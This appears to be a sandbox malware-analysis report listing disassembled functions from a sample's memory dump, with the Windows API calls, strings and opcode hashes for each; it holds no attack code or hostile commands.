Opcode Fuzzy Hash: ca787dc7bbec775aa9477db5187ae7e220693d519302c51c7fd341f62987a487
Instruction Fuzzy Hash: 6D1136361462508BEB128F24ECA8FEE3BA4EF13371B0801DDE9428B1B2C7714850CBA1

Function 00C11A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C11A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C11A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C11A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C11A8A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2f23d878648c150d5768ec9a8d7414511b9c7c6f13645f41f79a09dd1e0cb32f
Instruction ID: 1795bcc9e150bce1fa90dde09513af8d6a8f0c0334e296fb8b32b89d472df487
Opcode Fuzzy Hash: 2f23d878648c150d5768ec9a8d7414511b9c7c6f13645f41f79a09dd1e0cb32f
Instruction Fuzzy Hash: 5011273A901219FFEB109BA5C985FEDBB78EF09750F240091EA00B7290D6716E50EB94

Function 00C1E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C1E1FD
MessageBoxW.USER32(?,?,?,?), ref: 00C1E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C1E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C1E24D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 72489bebe97ccaa47f5ad03bec6b8b50a4ec66177dd8b40734516a29f3c8b435
Instruction ID: cd4581cd30bcbca6912763c7095a6697077a9c0e5836caf2a57fb7a2f3bb34e0
Opcode Fuzzy Hash: 72489bebe97ccaa47f5ad03bec6b8b50a4ec66177dd8b40734516a29f3c8b435
Instruction Fuzzy Hash: 0411D676A04258BBC7019FA8DC49BDE7FECAB47320F144265FD24E32A1D6B0DE4587A0

Function 00BDD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00BDCFF9,00000000,00000004,00000000), ref: 00BDD218
GetLastError.KERNEL32 ref: 00BDD224
__dosmaperr.LIBCMT ref: 00BDD22B
ResumeThread.KERNEL32(00000000), ref: 00BDD249

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 55c9e1fb2155e64a7ae21882788acd39558d000bdec2c14ab240040e97fc2722
Instruction ID: ef8ead90989bd256c258e6316dfe0e1fcd090395ea351372788c9fa36d8908e0
Opcode Fuzzy Hash: 55c9e1fb2155e64a7ae21882788acd39558d000bdec2c14ab240040e97fc2722
Instruction Fuzzy Hash: A901D6364051057BC7115BA5DC45BAEFAEDEF82330F10029AF965922E0EB71C905C6A0

Function 00BB600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BB604C
GetStockObject.GDI32(00000011), ref: 00BB6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB606A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 013e1191fdcf5605fe519a9bfa29f88d91145603e3de3a5f1a0ee9ca094a520c
Instruction ID: e9e1dd4b22db7074f2e5c3e0addcbeba76d4dbb595a8215e9cc2a123227607b5
Opcode Fuzzy Hash: 013e1191fdcf5605fe519a9bfa29f88d91145603e3de3a5f1a0ee9ca094a520c
Instruction Fuzzy Hash: 4D11AD72102508BFEF165FA58C84FFEBBA9FF093A4F440245FA1452020D7769C60DBA0

Function 00BD3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00BD3B56

Part of subcall function 00BD3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00BD3AD2
Part of subcall function 00BD3AA3: ___AdjustPointer.LIBCMT ref: 00BD3AED

_UnwindNestedFrames.LIBCMT ref: 00BD3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00BD3B7C
CallCatchBlock.LIBVCRUNTIME ref: 00BD3BA4

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 14481bc0a712ebb0cb669fbc658258c7ebdd7b941de54d6f7555af8a24532a89
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 2D012D32100148BBDF115F95CC46EEBBFE9EF48B54F04405AFE4856222E732D961DBA1

Function 00BE3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BB13C6,00000000,00000000,?,00BE301A,00BB13C6,00000000,00000000,00000000,?,00BE328B,00000006,FlsSetValue), ref: 00BE30A5
GetLastError.KERNEL32(?,00BE301A,00BB13C6,00000000,00000000,00000000,?,00BE328B,00000006,FlsSetValue,00C52290,FlsSetValue,00000000,00000364,?,00BE2E46), ref: 00BE30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BE301A,00BB13C6,00000000,00000000,00000000,?,00BE328B,00000006,FlsSetValue,00C52290,FlsSetValue,00000000), ref: 00BE30BF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 584e151de048b6a164aa859b7ef8d91c52bf75881db54e4d0349caf36413a39e
Instruction ID: 526872b1b6c0a6153bc66a470cbbdb46fa4835ab3d8d1908903f0cbd4c7e0ea0
Opcode Fuzzy Hash: 584e151de048b6a164aa859b7ef8d91c52bf75881db54e4d0349caf36413a39e
Instruction Fuzzy Hash: E901F736702262ABCB318BBA9C8CB6B7BD8EF46F61B240660F905E3151C721D901C6E0

Function 00C17464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C1747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C17497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C174AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C174CA

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 0b50171608fd7be827485b7751b67241efb5b7dadfddcb78f8ca12d92284e167
Instruction ID: b06855bab276f2620d0fbe727a5879c0c4e42b27e33d6dc975aeca40a0a1cdae
Opcode Fuzzy Hash: 0b50171608fd7be827485b7751b67241efb5b7dadfddcb78f8ca12d92284e167
Instruction Fuzzy Hash: 6511A1B52063109BE7208F14DD48BE67BFCFB01B00F108669A666D6161D770E984EF50

Function 00C1B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C1ACD3,?,00008000), ref: 00C1B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C1ACD3,?,00008000), ref: 00C1B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C1ACD3,?,00008000), ref: 00C1B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C1ACD3,?,00008000), ref: 00C1B126

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: b74e22e7264102926c119bd10b762c151a31522ba085816bc455492caaa3a1e3
Instruction ID: 056717b1f08fcbec0a8855e800ed855f3c16cecf58f8b95109f4e55e2496707b
Opcode Fuzzy Hash: b74e22e7264102926c119bd10b762c151a31522ba085816bc455492caaa3a1e3
Instruction Fuzzy Hash: FA115B71C0292CE7CF00AFE5E998BEEBF78FF4A711F214085D951B2191CB309A909B51

Function 00C12DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C12DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C12DD6
GetCurrentThreadId.KERNEL32 ref: 00C12DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C12DE4

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 5df89ff3f3b1fbe9f05f322f2b4036aeebf3891f9f3c8ad6dc4de68b17e99157
Instruction ID: 3582d0afa4813370857c5f042ef956f4f491289b8101392596e98c9542115965
Opcode Fuzzy Hash: 5df89ff3f3b1fbe9f05f322f2b4036aeebf3891f9f3c8ad6dc4de68b17e99157
Instruction Fuzzy Hash: 38E06D79602228BAD7202BA2EC8DFEF3E6CFB43BA1F014015B105D10A09AA08980D6B0

Function 00C48863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC9693
Part of subcall function 00BC9639: SelectObject.GDI32(?,00000000), ref: 00BC96A2
Part of subcall function 00BC9639: BeginPath.GDI32(?), ref: 00BC96B9
Part of subcall function 00BC9639: SelectObject.GDI32(?,00000000), ref: 00BC96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C48887
LineTo.GDI32(?,?,?), ref: 00C48894
EndPath.GDI32(?), ref: 00C488A4
StrokePath.GDI32(?), ref: 00C488B2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: d68c37b1ec28d21605f01d9edd56da1d8cceb68a6c7d7e01cbb30879744cabfd
Instruction ID: 125e697bb966bad5119395d86b4578a7263723f50e53ff2744a165941deb3bad
Opcode Fuzzy Hash: d68c37b1ec28d21605f01d9edd56da1d8cceb68a6c7d7e01cbb30879744cabfd
Instruction Fuzzy Hash: 7EF03A3A042258BAEB125F94AC09FCE3E59BF06710F048100FA12650E2C7755611CBA9

Function 00BC98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BC98CC
SetTextColor.GDI32(?,?), ref: 00BC98D6
SetBkMode.GDI32(?,00000001), ref: 00BC98E9
GetStockObject.GDI32(00000005), ref: 00BC98F1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 8a29b34c4f97e086259cca588303ee3cf826ac36cab35cc0aefa89676b97fc20
Instruction ID: cf81a2dbefc4ad58db9afac45a4e1244069b661ab6fc57c82c0ae89a3b04aa01
Opcode Fuzzy Hash: 8a29b34c4f97e086259cca588303ee3cf826ac36cab35cc0aefa89676b97fc20
Instruction Fuzzy Hash: 9BE06D35645280AAEB615B74AC49BEC3F60FB16336F048319F6FA580F1C7B15640DF10

Function 00C1162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C11634
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C111D9), ref: 00C1163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C111D9), ref: 00C11648
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C111D9), ref: 00C1164F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: e8625a090be229f7d403b1077c701aceb171a7677d9b63928d4717dd3e2842ee
Instruction ID: 6b1e9618d9a4654af444fd22c1d1ffc1435f45810be80c28d89e5728cdb4705c
Opcode Fuzzy Hash: e8625a090be229f7d403b1077c701aceb171a7677d9b63928d4717dd3e2842ee
Instruction Fuzzy Hash: 0AE04F35602211DBD7B01FA09D4DB8A3B68FF467A1F184808F655C90A0D66845808B50

Function 00C0D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C0D858
GetDC.USER32(00000000), ref: 00C0D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C0D882
ReleaseDC.USER32(?), ref: 00C0D8A3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a86cfe2d98ad0ddc4a6f29a96ec71808f66bfc43135b4e5c9612413cbad0dc46
Instruction ID: a63a4e0d6a03ac1762e2b8685acb5a652c429d66a88bb0e4f9a0ebe1ea29d221
Opcode Fuzzy Hash: a86cfe2d98ad0ddc4a6f29a96ec71808f66bfc43135b4e5c9612413cbad0dc46
Instruction Fuzzy Hash: 14E01AB8801204DFCB819FA0D888BADBBF1FB09310F11C099F816E7260C7388901EF40

Function 00C0D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C0D86C
GetDC.USER32(00000000), ref: 00C0D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C0D882
ReleaseDC.USER32(?), ref: 00C0D8A3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: dde824895d1b38effe5f04d7aa6681a6f8a1cff4d48b724858f513d53bc3839e
Instruction ID: 6c452d592986aa9b7ca691c0a7a8040f14466c1d053f63d60e1954279792c295
Opcode Fuzzy Hash: dde824895d1b38effe5f04d7aa6681a6f8a1cff4d48b724858f513d53bc3839e
Instruction Fuzzy Hash: 70E01A78801200DFCB909FA0D8887ADBBF1BB08310B118048F81AE7260C73859019F40

Function 00C24D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7620: _wcslen.LIBCMT ref: 00BB7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C24ED4

Strings

*, xrefs: 00C24E10
LPT, xrefs: 00C24DFB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: b3e82543f876006ff1719ff7e29bfb536d0c3d3d8b7cab497f0a5f65760d7e51
Instruction ID: dc20adeffa77f7f2edd940c69c901ef7735799f3dcc17f6941514ad97653b6c4
Opcode Fuzzy Hash: b3e82543f876006ff1719ff7e29bfb536d0c3d3d8b7cab497f0a5f65760d7e51
Instruction Fuzzy Hash: B8918175A00214DFDB18DF98D584EAABBF1BF84304F158099E41A9F762C771EE85CB90

Function 00BDE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00BDE30D

Strings

pow, xrefs: 00BDE2E5, 00BDE302

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 5791dd0cef295267ad27c0342664db68263ea342495aaad9b308748efd38919d
Instruction ID: c098f12692761c6e4f70ba7cd32602b877d0a08ad7320e8be9aaa29c3c32ee50
Opcode Fuzzy Hash: 5791dd0cef295267ad27c0342664db68263ea342495aaad9b308748efd38919d
Instruction Fuzzy Hash: 62518DA1A4C24296CB167715CD4177D7BE8DB00751F348AEAE0A54B3E9FF30CCC19A8A

Function 00BCE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00BCE1B1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a58b3fbea3f008f1c61c6acc10d64c9637006122dbc5b68dd0eb5029b7e9585d
Instruction ID: bc698e93b1ca9acdcf24054c7aed947968fe9ad22b7faeb7b51b6b64a84492be
Opcode Fuzzy Hash: a58b3fbea3f008f1c61c6acc10d64c9637006122dbc5b68dd0eb5029b7e9585d
Instruction Fuzzy Hash: EB510175644246DFDB25DF28C481BFA7BE8EF55310F288499E8A19B2D0D734DE42CBA0

Function 00BCF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BCF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BCF2BB

Strings

@, xrefs: 00BCF2AF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

